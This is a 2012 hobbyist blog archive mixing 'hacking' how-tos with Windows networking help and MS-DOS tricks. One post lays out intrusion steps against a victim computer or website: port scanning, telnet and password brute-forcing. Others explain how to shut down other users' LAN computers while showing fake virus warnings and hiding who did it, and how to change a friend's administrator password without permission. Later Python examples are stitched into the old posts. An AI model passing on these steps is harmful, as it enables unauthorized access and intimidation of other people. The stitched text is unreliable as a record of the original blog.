Saturday, 6 October 2012
How To Remote Computer Using IP address
Literally, hacking is accessing something or somebody on the internet without their permission or interest. In summary, hacking is a very easy job: it is like finding the hidden door of a house instead of using the front door, and taking the precious things inside. Among all kinds of hacking, hacking via IP address is one of the most common yet powerful starting points.
You may want to hack a website and put your advertisement there, or grab some database information. In this type of hacking you are dealing with the web server's computer rather than the administrator's computer, because www.website.com is hosted on a separate web server rather than on a personal computer.
Another case is accessing your friend's computer from your home. Again this is IP based, and it is possible only when your friend's computer is online; if it is off or not connected to the internet, remote IP hacking is totally impossible.
Well, both kinds of hacking follow the same process. Let's summarize what we must do.
Confirm the website or computer you want to hack.
Find or trace its IP address.
Make sure that the IP address is online.
Scan for open ports.
Check for vulnerable ports.
Access through the port.
Brute-force the username and password.
Now let me describe it briefly, in basic steps that a child could understand.
First, getting the IP address of victim.
To get the IP address of the victim website, ping for it in command prompt.
For example,
ping www.google.com
will fetch the IP address of Google.com
This is how we can get the IP address of the victim's website.
How about your friend's PC? You can't do www.yourfriendsname.com, can you? Finding your friend's IP address is a little tougher, and tougher still if he has a dynamic IP address that keeps changing.
One of the widely used methods to detect your friend's IP address is by chatting with him.
You might find this article helpful
How to get the IP address using MSN/Yahoo/Pidgin messenger
Now you have the IP address, right? Is it online?
To know the online status, just ping the IP address; if it is online it will reply.
If the IP address is online, scan for the open ports. Open ports are like closed doors without locks; you can go in and out easily.
Use Advanced Port Scanner to scan all open and vulnerable ports.
Now that you have the IP address and an open port of the victim, you can use telnet to try to access them. Make sure that you have telnet enabled on your computer, or install it from Control Panel > Add/Remove Programs > Add Windows Components.
Now open the command prompt and use the telnet command to connect to the IP address. Use the following syntax for the connection:
telnet [IP address] [Port]
You’ll be asked to input login information.
If you can guess the login information easily then it's OK. Otherwise you can use some brute-forcing tools like this one.
In this way you'll be able to hack a remote computer using only its IP address.
Remote Desktop in Mac OS
Using Remote Desktop, you can access a computer from a remote location. To connect to a Windows computer from another Windows computer, see In Windows, how do I use Remote Desktop to access my remote computer? To connect to a Windows computer from a remote computer running Mac OS X, see below.
To enable Remote Desktop, you must have administrative rights on the computer you want to use as the host (i.e., the computer to which you will connect from a remote location), which must be running one of the following versions of Windows:
Windows 7 Professional, Enterprise, or Ultimate
Windows Vista Business, Enterprise, or Ultimate
Windows XP Professional
Before making a remote connection, first enable the Remote Desktop feature on your host computer, and then install Remote Desktop Connection client software on your client computer.
Enabling Remote Desktop
To enable the Remote Desktop feature on your host (Windows) computer:
From the Start menu, select Control Panel (or Settings, and then Control Panel). Double-click System.
In Windows 7 and Vista, click Remote settings. In the "Remote Desktop" section, select one of the two options to allow connections from other computers.
In Windows XP, select the Remote tab. Select Allow users to connect remotely to this computer.
To choose which users will have remote access, in 7 and Vista, click Select Users... , or in XP, click Select Remote Users... . Typically, all administrators of the computer will have access by default. Each user must have a password before you can allow remote access.
When you are finished, click OK. Your computer will now be able to accept incoming Remote Desktop connections.
Installing Remote Desktop Connection client software
You can download the Remote Desktop Connection (RDC) client for Mac OS X from Microsoft Mactopia.
Opening a connection
Depending upon your network configuration and system requirements, you may first have to establish a VPN connection to your host computer's network.
At Indiana University:
You must first establish a VPN connection if:
You are off campus, connecting to a computer on campus.
You are on campus, connecting to your home computer in campus or Greek housing.
See The basics of VPN at IU.
Alternatively, from your web browser, you can use the Remote Desktop application in IUanyWare, located in the "Utilities" section.
See How do I set up and use IUanyWare?
For more about remote desktop connections on the IU network, see About the block on off-campus remote desktop connections at IU.
Launch Remote Desktop Connection.
In the Remote Desktop Connection window, in the "Computer:" field, type the DNS name or IP address of the destination host.
Click Connect.
In the window that appears, enter your username, passphrase, and domain.
Click OK to start your session. When you log out of your Windows session, the RDC application will close.
Friday, 5 October 2012
Windows Server 2003 IP setting
In this article I will walk you through the Advanced TCP/IP settings dialog and its relevant tabs, so that you can better understand what each option is used for and how to configure it.
Windows 2003 comes with a number of new features for TCP/IP, including support for IP Version 6, automatically determining the Interface and Gateway metric, and the Alternate configuration tab which allows you to specify an alternate IP Address to use in absence of a DHCP server (before APIPA kicks in).
The Advanced TCP/IP dialog will allow you to configure settings relative to DNS, WINS and specify multiple IP Addresses and Gateways (which can even be used if you only have one network card on the machine).
To bring up the Advanced TCP/IP Settings dialog, simply right click the desired connection from the Network Connections folder, and choose properties to open the Properties dialog of the selected connection. Now select Internet Protocol (TCP/IP) from the list and click the Properties button. This will open the Internet Protocol (TCP/IP) Properties dialog. Next, click the Advanced button and up pops the Advanced TCP/IP Settings dialog with four tabs to choose from:
IP Settings – Allows you to add more IP Addresses or change the routing properties of the network card.
DNS – Allows you to set how the TCP/IP connection uses DNS.
WINS – Allows you to set how the TCP/IP connection uses WINS for computers that can’t access Active Directory.
Options – Allows you to set TCP/IP Filtering and specify which ports will be used for TCP/IP communication.
Advanced TCP/IP Settings – The IP Settings Tab
The IP addresses box at the top allows you to assign additional IP Addresses to a single network card. This is useful if you are hosting multiple websites on the same web server and want to give each its own IP Address, for example. Simply click the Add button to add an IP Address and Subnet Mask. Click Edit to modify the currently selected item and Remove to delete the currently selected item from the list.
Figure 1: The IP Settings Tab
The Default gateways box in the middle is used if you want the network connection to use multiple default gateways. Click the Add button to add a Default gateway and assign it a Metric value. A metric value is the cost of a specific route. Cost can reflect speed, reliability and number of hops. The route with the lowest metric value is used, so if you have two Default Gateways set up, one with a metric of 10 and the other with a metric of 20, the one with 10 will be chosen first. Leaving the metric at automatic means that the route metric for this default gateway will be calculated automatically, and the fastest route chosen.
Note: If you fire up the Command Prompt and type “route print” with no quotes, the IP Routing table is displayed with the metric value listed as one of the properties of each IP Address and its associations.
The Edit and Remove buttons in the Default gateways box do exactly the same as for the IP addresses box (explained above).
At the bottom of the IP Settings tab you can set whether you want the Interface to have a specific metric or to be assigned one automatically. By default this option is checked. Uncheck it if you wish to input an Interface metric value of your choice.
Advanced TCP/IP Settings – The DNS Tab
The "DNS server addresses, in order of use box" at the top of the DNS tab is used to list the IP Addresses of the DNS Servers that will be used for name resolution. These servers are ordered and used in priority, meaning if one server does not work then it will move to the next one down the list. To set the order of IP Addresses, select an IP Address and press the up and down button on the right hand side.It is important to keep in mind that TCP/IP will not move on to the next server if it fails to resolve the request. It will only move to the next server if the first server it tries is unavailable (perhaps down for maintenance or in the middle of a reboot).
Append primary and connection specific DNS suffixes, and Append parent suffixes of the primary DNS suffix are enabled by default. These options are used for resolution of unqualified names.
The first option is used to resolve unqualified names using the parent domain. For example, if you had a computer name of “andrew” and a parent domain called ztabona.com it would resolve to andrew.ztabona.com. The query would fail if andrew.ztabona.com does not exist in the parent domain. The second option is used to resolve unqualified names using the parent-child domain hierarchy. A DNS query will move one step up the domain hierarchy if it fails at the current level. It will do this until it reaches the root of the hierarchy.
If you have an environment which consists of a client machine forming part of multiple domains then you can add a bunch of domains to the Append these DNS suffixes (in order) list so these will be searched as part of the DNS query, instead of using the parent domain.
Figure 2
The textbox on the right of the DNS suffix for this connection is used to explicitly set a DNS suffix that will override any other setting already specified for this connection.
Register this connection’s addresses in DNS will register all this connection’s IP Addresses in DNS under the computer’s FQDN. Using this connection’s DNS suffix in DNS registration will register all IP Addresses for this connection in DNS under the parent domain.
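The suffix-appending options above decide which fully qualified names a client actually sends to its DNS servers. The following is an added example (not from the original article) that models that candidate list and the "query fails, move one step up" behaviour; the suffix corp.ztabona.com, the zone contents and the stop-at-two-labels default are constructed assumptions.

```python
from typing import Dict, List, Optional, Tuple


def suffix_candidates(name: str,
                      primary_suffix: str,
                      connection_suffix: Optional[str] = None,
                      search_list: Optional[List[str]] = None,
                      append_primary_and_connection: bool = True,
                      append_parent_suffixes: bool = True,
                      min_suffix_labels: int = 2) -> List[str]:
    """Return the fully qualified names tried, in order, for an unqualified name.

    Mirrors the DNS tab options: "Append primary and connection specific DNS
    suffixes", "Append parent suffixes of the primary DNS suffix" (devolution)
    and the "Append these DNS suffixes (in order)" list, which replaces the
    first two whenever it is populated.
    """
    name = name.rstrip(".")
    if "." in name:
        raise ValueError("only unqualified (single-label) names are modelled here")

    def join(host: str, suffix: str) -> str:
        return f"{host}.{suffix.strip('.')}"

    if search_list:
        # An explicit search list is used instead of the parent domain.
        return [join(name, s) for s in search_list]

    candidates: List[str] = []
    if append_primary_and_connection:
        for suffix in (primary_suffix, connection_suffix):
            if suffix and join(name, suffix) not in candidates:
                candidates.append(join(name, suffix))

    if append_parent_suffixes and primary_suffix:
        # Devolution: drop the leftmost label of the primary suffix one step at
        # a time. Assumption: stop before the suffix shrinks below
        # min_suffix_labels (default 2), so an internal host name is never
        # queried as e.g. andrew.com against public DNS.
        labels = primary_suffix.strip(".").split(".")
        while len(labels) > min_suffix_labels:
            labels = labels[1:]
            fqdn = join(name, ".".join(labels))
            if fqdn not in candidates:
                candidates.append(fqdn)
    return candidates


def resolve_unqualified(name: str, zone: Dict[str, str], primary_suffix: str,
                        **settings) -> Optional[Tuple[str, str]]:
    """Try each candidate against a constructed zone (FQDN -> IP); first hit wins.

    A candidate with no record is a failed query, which is exactly what moves
    resolution one step up the domain hierarchy.
    """
    for fqdn in suffix_candidates(name, primary_suffix, **settings):
        if fqdn in zone:
            return fqdn, zone[fqdn]
    return None


if __name__ == "__main__":
    # Constructed zone: the host only has a record at the parent domain.
    zone = {"andrew.ztabona.com": "10.0.0.5"}
    print(suffix_candidates("andrew", "corp.ztabona.com"))
    print(resolve_unqualified("andrew", zone, "corp.ztabona.com"))
```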
Advanced TCP/IP Settings – The WINS Tab
The WINS tab is used to specify WINS related settings such as the list of WINS servers to be used for NETBIOS name to IP resolution, the LMHOSTS file to be used as an alternate means of lookups and the NETBIOS settings for the network connection. Pre-Windows 2000 machines and applications use NETBIOS for name to IP resolution. If you have a Windows 2003 machine that acts as a file or print server and any client machines want to communicate with it, you will have to make use of NETBIOS. It is unlikely that you have no pre-Windows 2000 machines on your network, but if that is the case, go ahead and disable NETBIOS over IP; you'll save on memory and CPU consumption and free up resources.
Use the "WINS addresses, in order of use box" at the top to add the WINS servers you want the system to use for IP to name resolution. Press the Add button for a small dialog box to appear waiting for you to enter the IP Address of the WINS server. Use the Edit and Remove buttons to modify or delete a selected item respectively. If you have more than one WINS server in the list, press the up and down arrow buttons to adjust the priority of which servers will be queried first. If one server is not available then the next one down will be used, and so on and so forth.
Figure 3
Check the Enable LMHOSTS lookup checkbox so that if WINS cannot resolve a name then the local LMHOSTS file will be used. The LMHOSTS file can be found in \WINDOWS\system32\drivers\etc. It goes by the name of lmhosts.sam and can be modified in a text editor. Entries are placed at the bottom of the file and when used, the listed IP Addresses are matched against a specified host name. If you already have an LMHOSTS file defined on another machine on the network, use the Import LMHOSTS button to select this file and import it to the local machine.
The NETBIOS settings at the bottom allow you to explicitly define how NETBIOS will be used on the system. Choose Default if you want the DHCP server to assign the NETBIOS setting, Enable NETBIOS over TCP/IP if you use a static IP Address or the DHCP Server does not give NETBIOS settings, and Disable NETBIOS over TCP/IP if you do not use NETBIOS or WINS on your network.
Advanced TCP/IP Settings – The Options Tab (TCP/IP Filtering)
The Options tab allows you to configure TCP/IP Filtering settings; you can define which ports or protocols are permitted. Select the Permit Only radio button and use the Add button to add TCP/UDP port numbers or a protocol version to the respective list. If you permit traffic only from a defined set of ports, all other traffic will be dropped.
Tutorial Adobe Photoshop CS for Newbie
Hy guys :)
This morning I will give you a tutorial about Adobe Photoshop CS. The tutorial is in PDF format, 10 MB in size.
You can download it from the link below:
Download Link Tutorial Adobe Cs
If you want more Adobe CS tutorials, you can look in the download tabs or contact me.
All of that is free.
see you guys :)
"Have a Nice Day"
Thursday, 4 October 2012
Make Your Own Social Media with SocialEngine
Now we can make our own social media site like Facebook.
It's simple: just download and install.
Check it out, and be the first. Just click
SocialEngine
Be the first friend.
How to Shutdown Another Computer in LAN Area
1. Go to Notepad.
2. Type in command.com and save as cmd.bat. A lot of schools block CMD on computers, and this is how to override that.
3. Open it up and it should go to CMD.
4. Type in 'shutdown -i' and press 'Enter'.
5. You will come to this white box with options....wow, that was a vague description. You'll know it when you see it. What you do now is add the name of the computer that you want to shut down, if necessary.
6. You can choose whether to warn users or not that their computer is about to shut down. Personally, I prefer to warn users and as the comment, I like to put something like "WARNING, SECURITY BREACH IN SYSTEM" or "WARNING, VIRUS DETECTED. HARD DRIVE BEING WIPED".
7. Press okay and then shut down your computer as quickly as possible to avoid people knowing it was you.
8. Watch people freak out when their computer shuts down unexpectedly.
This is a really fun trick and I have done this to my brother at home while he was playing minecraft. He was REALLY angry when he found out it was me.
Hack by Changing administrator Password
Okay, today, let's have some fun with Google. Also, today, I will show you how to hack anyone's computer by changing their administrator password. It's all completely reversible, so it is a Trick AND a hack today.
Let's begin with having some fun with Google. How about we start with a very minor trick that you all will probably all know. If you do not have Google, then skip over to the hack.
1. Open up Google.
2. Type : google l33t into google search bar and press I'm Feeling Lucky.
Type : google loco into google search bar and press I'm Feeling Lucky.
Type : google gothic into google search bar and press I'm Feeling Lucky.
Type : ewmew fudd into google search bar and press I'm Feeling Lucky.
Type : xx-klingon into google search bar and press I'm Feeling Lucky.
Type : xx-piglatin into google search bar and press I'm Feeling Lucky.
Type : google bsd into google search bar and press I'm Feeling Lucky.
Type : google linux into google search bar and press I'm Feeling Lucky.
Type : answer to life, the universe, and everything into google and press search.
Wasn't that fun? Okay, let's do some graffiti with Google now.
3. Open up Google again.
4. Open up www.netdisaster.com and type in your target website.
5. Have some fun.
Okay, let's do the hack. Do you have a buddy that you secretly hate? Come on. We all do. So, next time you're over at their house, go to their computer while they're in the washroom or cooking or playing a sport.
Just as a tip, if your friends know that you hack as a hobby, don't do this, because they will suspect you're at fault in a second.
Let's get started.
1. Open up notepad and type in command.com
2. Save it as 'cmd.bat'
3. Open it up. You should come to a black screen.
4. Type in net user.
5. Then find the name of the administrator.
6. Once you have the name, type in 'net user [administrator name]*'
7. Type in the password that you choose.
Yes, your buddy may be pissed off, but it is completely reversible! Do the same process and just type in the password that your buddy chooses.
Various MS DOS
Contents:
- TRUENAME
- FDISK /STATUS
- FDISK /MBR
- SHELL=C:\COMMAND.COM /P /F
- COMMAND /F
- COMMAND /P
- COMMAND /D
- VER /R
- ECHO OFF and ECHO ON
- FORMAT /AUTOTEST
- FORMAT /BACKUP
- FORMAT /SELECT
- FORMAT /SELECT /U
- FORMAT /H
- IF EXIST <dirname>\NUL <command> and IF EXIST EMMXXXX0 <command>
- Using ATTRIB to hide directories
- SWITCHES=/W
- FOR %%V IN (/SOMETHING)
- DIR,
- COPY. A:
- DOS?=HIGH
- INSTALLHIGH
- Using : for batch file comments
- REM in lines with pipes or redirection
- Delimiter character
===========================================================================
TRUENAME
--------
Internal DOS 5.0 command. Canonicalizes a filename or path (using DOS interrupt 21h, function 60) and prints the actual directory.
Syntax:
TRUENAME filename - Prints the complete path to file.
TRUENAME directory - Prints the complete path to directory.
Note: If the path is in a network, it starts with a \\machine-name.
TRUENAME is analogous to the UNIX "whence" command. It returns the real fully-qualified path name for a command.
TRUENAME is useful in networks, where a physical drive may be mapped to a logical volume, and the user needs to know the physical location of the file. It ignores the DOS SUBST and JOIN commands, or network MAPped drives.
TRUENAME is an undocumented MS-DOS feature, but it is documented in JP Software's 4DOS software (COMMAND.COM replacement) as follows:
Syntax:
TRUENAME [d:][path]filename
Purpose:
Returns a fully qualified filename.
Comments:
TRUENAME will see "through" JOIN and SUBST commands, and requires MS-DOS 3.0 or above.
Example:
The following command uses TRUENAME to get the true pathname for a file:
c:\>subst d: c:\util\test
c:\>truename d:\test.exe
c:\util\test\test.exe
TRUENAME will reveal the full name, drive and path of the filename. If you specify a wildcard (*) in the filename, it will expand the filename to use question marks instead. If the path includes the ..\ sequence, TRUENAME will examine the directory structure and calculate the path.
Stranger still, the line:
TRUENAME \CRONK\FLIBBET\..\ART
...produces the response:
C:\CRONK\ART
...even if the directories \CRONK\FLIBBET and the file ART don't exist! Don't expect this command to work well across networks. After all, this is still undocumented in MS-DOS for a reason!
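The behaviour described above (seeing through SUBST, folding ..\ without touching the disk, rewriting * to ? marks) as a small lexical model in Python. This is an added example, not DOS code or anything from the original file; the one-cwd-for-all-drives simplification and the 8.3 wildcard fill are my assumptions.

```python
def _expand_wildcards(name: str) -> str:
    """8.3 rule (assumption): '*' becomes '?' up to the end of its field."""
    base, dot, ext = name.partition(".")

    def fill(field: str, width: int) -> str:
        if "*" in field:
            i = field.index("*")
            field = field[:i] + "?" * (width - i)
        return field

    base = fill(base, 8)
    return base + "." + fill(ext, 3) if dot else base


def truename(path: str, cwd: str, substs=None) -> str:
    """Lexical model of DOS TRUENAME.

    cwd is the current directory, e.g. 'C:\\UTIL'; substs maps a SUBST
    drive to its physical path, e.g. {'D:': 'C:\\UTIL\\TEST'}.
    Nothing is looked up on disk: '..' is folded purely by text, which is
    why \\CRONK\\FLIBBET\\..\\ART resolves even if those directories are absent.
    Simplification (assumption): a relative path on a drive other than cwd's
    is taken from that drive's root, since DOS keeps one cwd per drive.
    """
    substs = {k.upper(): v.upper().rstrip("\\") for k, v in (substs or {}).items()}
    cwd = cwd.upper().replace("/", "\\")
    path = path.upper().replace("/", "\\")

    # 1. Separate the drive letter; default to the current drive.
    if len(path) >= 2 and path[1] == ":":
        drive, rest = path[:2], path[2:]
    else:
        drive, rest = cwd[:2], path

    # 2. Make the path absolute on its drive.
    if not rest.startswith("\\"):
        base = cwd[2:] if drive == cwd[:2] else ""
        rest = base.rstrip("\\") + "\\" + rest

    # 3. See through SUBST: the logical drive's root is a physical directory.
    if drive in substs:
        phys = substs[drive]
        drive, rest = phys[:2], phys[2:] + rest

    # 4. Fold '.' and '..' lexically; '..' at the root stays at the root.
    parts = []
    for comp in rest.split("\\"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if parts:
                parts.pop()
            continue
        parts.append(comp)

    # 5. Wildcards in the final component are rewritten to '?' marks.
    if parts:
        parts[-1] = _expand_wildcards(parts[-1])
    return drive + "\\" + "\\".join(parts)


if __name__ == "__main__":
    # The two cases quoted in the text, plus a traversal that climbs past the root.
    print(truename("d:\\test.exe", "C:\\", {"d:": "c:\\util\\test"}))
    print(truename("\\CRONK\\FLIBBET\\..\\ART", "C:\\"))
    print(truename("..\\..\\..\\X.TXT", "C:\\UTIL\\TEST"))
```

The same lexical-first rule is what a path-traversal check has to apply before comparing a user-supplied path against an allowed prefix.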
===========================================================================
FDISK /STATUS
-------------
Prints a screen just like using option 4 of FDISK, "Partition information", but includes extended partition information. Nice if you want to get an overview without fear of pressing the wrong keys.
Doesn't work in DOS 3.30.
===========================================================================
FDISK /MBR
----------
MS-DOS 5.0 FDISK has an undocumented parameter, /MBR, that causes it to write the master boot record to the hard disk without altering the partition table information. While this feature is not documented, it can be told to customers on a need-to-know basis.
Warning: Writing the master boot record to the hard disk in this manner can make certain hard disks partitioned with SpeedStor unusable. It can also cause problems for some dual-boot programs, or for disks with more than 4 partitions. Specific information is below.
What is the MBR?
At the end of the ROM BIOS bootstrap routine, the BIOS will read and execute the first physical sector of the first floppy or hard drive on the system. This first sector of the hard disk is called the master boot record, or sometimes the partition table or master boot block. At the beginning of this sector of the hard disk is a small program. At the end of this sector is where the partition information, or partition table, is stored. This program uses the partition information to determine which partition is bootable (usually the first primary DOS partition) and attempts to boot from it.
This program is what is written to the disk by FDISK /MBR and is usually called the master boot record. During normal operation, FDISK only writes this program to the disk if there is no master boot record.
Why is the MBR changed during Setup?
During installation of Microsoft MS-DOS 5 Upgrade, Setup will replace the master boot record on the hard disk with code to display the message:
The MS-DOS 5.0 Setup was not completed.
Insert the UNINSTALL #1 diskette in drive A.
Press the ENTER key to continue.
This message should be erased and the master boot code rewritten before Setup is completed. If a problem occurs during Setup and you return to the previous MS-DOS, UNINSTAL should also remove this message. However, should Setup or UNINSTAL fail to remove this message, or should the master boot record become corrupted, a new master boot record can be written to the disk using the following command:
C:\>fdisk /mbr
WARNINGS:
This option should not be used if:
- the disk was partitioned using Storage Dimensions'
SpeedStor utility with its /Bootall option
- more than 4 partitions exist
- certain dual-boot programs are in use
Storage Dimensions' SpeedStor utility using the /Bootall option redefines the drive's physical parameters (cylinder, head, sector). /BOOTALL stores information on how the drive has been changed in an area of the master boot record that MS-DOS does not use. FDISK /MBR will erase that information, making the disk unusable.
Some older OEM versions of MS-DOS and some third-party partitioning utilities can create more than 4 partitions. Information on the additional partitions is commonly stored in an area that FDISK /MBR will overwrite.
Some dual-boot programs have a special MBR that asks the user which operating system they want on bootup. FDISK /MBR erases this program. Dual-boot systems that boot whichever partition is marked Active are not affected by FDISK /MBR.
If you have a Boot Sector Virus, just boot from a known "clean" floppy disk that's write protected and which has FDISK on it, and run FDISK /MBR.
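To make the MBR layout and the FDISK /MBR warnings above concrete, here is an added Python example (not from the original file): it splits a 512-byte sector into the bootstrap program and the four-entry partition table, models the /MBR rewrite as "replace the code region, keep the table and signature", and does the known-good-hash comparison you would use for the boot-sector-virus case. The sample sector is constructed here; the byte offsets are the standard on-disk layout.

```python
import hashlib
import struct

# Standard MBR layout (on-disk format facts, not quoted from the text):
SECTOR_SIZE = 512
CODE_LEN = 446            # bootstrap program: bytes 0..445 (what FDISK /MBR rewrites)
TABLE_OFF = 446           # four 16-byte partition entries: bytes 446..509
ENTRY_LEN = 16
SIG_OFF = 510             # 0x55 0xAA boot signature: bytes 510..511
ENTRY_FMT = "<B3sB3sII"   # status, CHS start, type, CHS end, LBA start, sector count


def parse_mbr(sector: bytes) -> dict:
    """Split one 512-byte sector into its code region and partition table."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("an MBR is exactly one 512-byte sector")
    if sector[SIG_OFF:] != b"\x55\xAA":
        raise ValueError("missing 0x55AA boot signature")
    partitions = []
    for i in range(4):                       # the table has exactly four slots
        off = TABLE_OFF + i * ENTRY_LEN
        status, _chs0, ptype, _chs1, lba, count = struct.unpack(
            ENTRY_FMT, sector[off:off + ENTRY_LEN])
        if ptype == 0:
            continue                         # unused slot
        partitions.append({
            "slot": i,
            "bootable": status == 0x80,      # the Active flag the boot code honours
            "type": ptype,
            "lba_start": lba,
            "sectors": count,
        })
    return {
        "code_sha256": hashlib.sha256(sector[:CODE_LEN]).hexdigest(),
        "partitions": partitions,
    }


def rewrite_boot_code(sector: bytes, new_code: bytes) -> bytes:
    """Model of FDISK /MBR: replace the program, keep table and signature.

    Anything a third-party tool stashed inside the 446-byte code region
    (SpeedStor /BOOTALL geometry, extra partitions, a dual-boot menu) is
    lost here, which is exactly the warning given in the text.
    """
    if len(new_code) > CODE_LEN:
        raise ValueError("boot code must fit in %d bytes" % CODE_LEN)
    padded = new_code + b"\x00" * (CODE_LEN - len(new_code))
    return padded + sector[CODE_LEN:]


def boot_code_matches(sector: bytes, baseline_sha256: str) -> bool:
    """Boot-sector-virus check: compare the code region to a known-good hash."""
    return parse_mbr(sector)["code_sha256"] == baseline_sha256


def build_sample_mbr() -> bytes:
    """Constructed sample: a dummy boot stub and one active FAT16 partition."""
    stub = b"\xEB\xFE" + b"constructed boot stub"       # JMP $ followed by filler
    code = stub + b"\x00" * (CODE_LEN - len(stub))
    active = struct.pack(ENTRY_FMT, 0x80, b"\x01\x01\x00", 0x06,
                         b"\xFE\x3F\x0C", 63, 204737)
    return code + active + b"\x00" * (3 * ENTRY_LEN) + b"\x55\xAA"


if __name__ == "__main__":
    mbr = build_sample_mbr()
    before = parse_mbr(mbr)
    print("partitions:", before["partitions"])
    rewritten = rewrite_boot_code(mbr, b"\xEB\xFE" + b"replacement stub")
    print("table preserved:", parse_mbr(rewritten)["partitions"] == before["partitions"])
    print("code unchanged:", boot_code_matches(rewritten, before["code_sha256"]))
```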
===========================================================================
SHELL=C:\COMMAND.COM /P /F
--------------------------
The /F in the CONFIG.SYS SHELL= statement forces a "Fail" response to all "Abort, Retry, Fail" prompts issued by the DOS critical error handler.
===========================================================================
COMMAND /F
----------
Entered on the command line, COMMAND /F makes all those annoying "Abort, Retry, Ignore, Fail" disk error messages default to "Fail" from then on until rebooting.
===========================================================================
COMMAND /P
----------
For DOS 3.30 (not checked with other versions): Docs say that this doesn't allow you to exit back to the previous shell, but /P also forces AUTOEXEC.BAT to be run on secondary shells.
===========================================================================
COMMAND /D
----------
When used with a primary shell, or secondary with /P, prevents execution of AUTOEXEC.BAT.
===========================================================================
VER /R
------
Yields extended information about the DOS version:
MS-DOS Version 5.00
Revision A
DOS is in HMA
Doesn't work with DOS 3.30. VER /R is a documented feature of JP Software's 4DOS.
===========================================================================
ECHO OFF and ECHO ON
--------------------
Entering ECHO OFF from the command line erases the prompt and leaves just a cursor on the screen. ECHO ON from the command line restores the prompt. This works with all versions of DOS.
One of the most frequently asked questions is "How do I ECHO a blank line in a batch file?" The most common answer is to use ECHO directly followed by a period, like so: ECHO. However, just about any "white space" character will work, as well as any "delimiter". The following alternatives can be used: ECHO. ECHO" ECHO, ECHO: ECHO; ECHO[ ECHO] etc. Apparently it's just the way that the command handles the delimiter, and it has been available from way back! Microsoft only began mentioning it in the documentation recently, though, and their examples use a period.
===========================================================================
FORMAT /AUTOTEST
----------------
The autotest parameter will allow FORMAT to proceed, checking the existing format of the disk (unless the /U parameter with DOS 5 or 6 is also present), and proceeding with the format.
All this will take place with no delay and no waiting for user input. It will also end without pausing. It will not ask for a volume label or whether to format another diskette.
WARNING! This procedure will also work on hard drives! Be very cautious if you plan to use this feature!
===========================================================================
FORMAT /BACKUP
--------------
This works exactly like /AUTOTEST, but it does ask for a volume label.
===========================================================================
FORMAT /SELECT
--------------
This is like the DOS MIRROR command... For safety-fanatics only.
===========================================================================
FORMAT /SELECT /U
-----------------
Just makes a disk unreadable. Guess it could be handy?
===========================================================================
FORMAT /H
---------
In DOS 3.30 (not tested with other versions), FORMAT /H will cause the format to begin immediately after pressing Y in response to "Format another", rather than displaying "Place disk to be formatted in drive x: and press Enter" on a second and subsequent disks.
In DOS 5.0, FORMAT reports "invalid switch".
===========================================================================
IF EXIST <dirname>\NUL <command> and IF EXIST EMMXXXX0 <command>
----------------------------------------------------------------
This is a handy quirk of DOS. Installable drivers are seen as files in all directories. You can use the if exist test to either test for the existence of a directory, with "if exist <dirname>\nul", which fails if the directory does not exist because the nul device is not found; or to test whether any driver is loaded, such as the DOS 5 or 6 EMM386 memory manager.
Caveats: For testing NUL, you need to know the name of the directory or the driver whose existence you are testing, and this is MS-DOS specific -- it doesn't work on network drives, and may not work under DR-DOS.
Where did you learn the "EMMXXXX0" name from? Instead of typing MEM /C, type MEM /D for the "debug" listing.
The only trouble is that IF EXIST returns true for COM3/4 and LPT2/3 even if the hardware does not exist.
===========================================================================
Using ATTRIB to hide directories
--------------------------------
The DOS 5.0 and 6.0 ATTRIB command can do the same thing for directories as it can for files: ATTRIB +H <dirname> will hide the named directory.
===========================================================================
SWITCHES=/W
-----------
Enables you to have the Windows 3.0 WINA20.386 file anywhere on your boot drive. Without this you have to have it in the root directory.
This should not be used with Windows 3.1, since it appears to waste around 120K of UMBs.
===========================================================================
FOR %%V IN (/SOMETHING)
-----------------------
How can a batch file (without 4DOS) determine from which drive it has been started?
Example: C:\>a:test.bat
Now my batch should be able to find out that it is located on drive A: (not the path, only the drive!).
In a batch file, the variable %0 contains the name of the batch file as it was typed at the command line. If you run the batch file as A:TEST.BAT, %0 will be "A:TEST.BAT". If you have the directory on your path, and simply type TEST, then %0 will be "TEST". The drive, path, and extension will only appear in %0 if you enter them in the command used to call the batch file (either typed at the command line, or called from another batch file). So, you must specify the drive as part of the batch filename for this to work.
To extract the drive only from %0, use the undocumented FOR %%V in /SOMETHING command:
set drive=
for %%v in (/%0) do call test2 %%v
echo Calling drive is %drive%
...where TEST2.BAT is:
REM The first call receives the drive letter, the second the rest of %0;
REM only set DRIVE while it is still empty so the first call wins.
if '%drive%'=='' set drive=%1:
FOR %%V IN (/SOMETHING) DO WHATEVER will do WHATEVER twice -- the first time with %%V set to the first character in SOMETHING ("S"), the second time with all the remaining characters in SOMETHING ("OMETHING"). If SOMETHING is only a single character, WHATEVER will only be called once, with that character in %%V. If the single character is a wildcard (? or *) that wild card will not be expanded to a set of filenames. (The main purpose of this feature is apparently to allow inclusion of the literal characters "?" and "*" without them being expanded.)
This works in DOS 3.30 and later.
===========================================================================
DIR,
----
Using a comma immediately after DIR shows ALL files, including the HIDDEN ones.
This appears only to work with DOS 5.0 and 6.0. With 3.30, it doesn't display either IO.SYS, MSDOS.SYS (both with S, H and R attribs) or a test file with A and H attribs.
With DOS 5.0, it displayed a test file with H and A, but would not display IO.SYS or MSDOS.SYS with S, H and R. This isn't surprising actually, since S alone (without H) will prevent inclusion of a file in a normal DIR.
Not tested with DOS 4.x. Not supported by JP Software's 4DOS.
===========================================================================
COPY. A:
--------
The use of a period IMMEDIATELY after some DOS statements will work just like *.*
Examples: DEL. (erase all files in current directory)
COPY. A: (copy all files in current directory to A:)
There may be more statements with which it works.
This is actually a documented although obscure feature, though the ability to use the period with COPY is not documented. What is documented is the fact that "." and ".." can be used to represent the current and parent directories respectively, and these will work with many applications which can handle directory names as arguments. In this case the "." could also be viewed as a replacement for "*.*"
===========================================================================
DOS?=HIGH
---------
DOS?=HIGH in CONFIG.SYS with DOS 6.0 will prompt you whether to load the DOS kernel high (into the HMA) or not.
===========================================================================
INSTALLHIGH
-----------
In DOS 6.0, there is an undocumented CONFIG.SYS command called INSTALLHIGH= which works just like INSTALL= but loads the TSR high (into upper memory).
The only drawback to this is that MemMaker will not touch INSTALLHIGH lines during the optimizing process. It just takes it as it is currently. But then again, INSTALL= is ignored too. All in all, INSTALL and INSTALLHIGH really are commands to set up manually by the user, and are not really recommended for normal use. Load TSRs at the beginning of AUTOEXEC.BAT (and using LOADHIGH if desired).
Example:
DOS=HIGH,UMB
DEVICE=C:\DOS\HIMEM.SYS
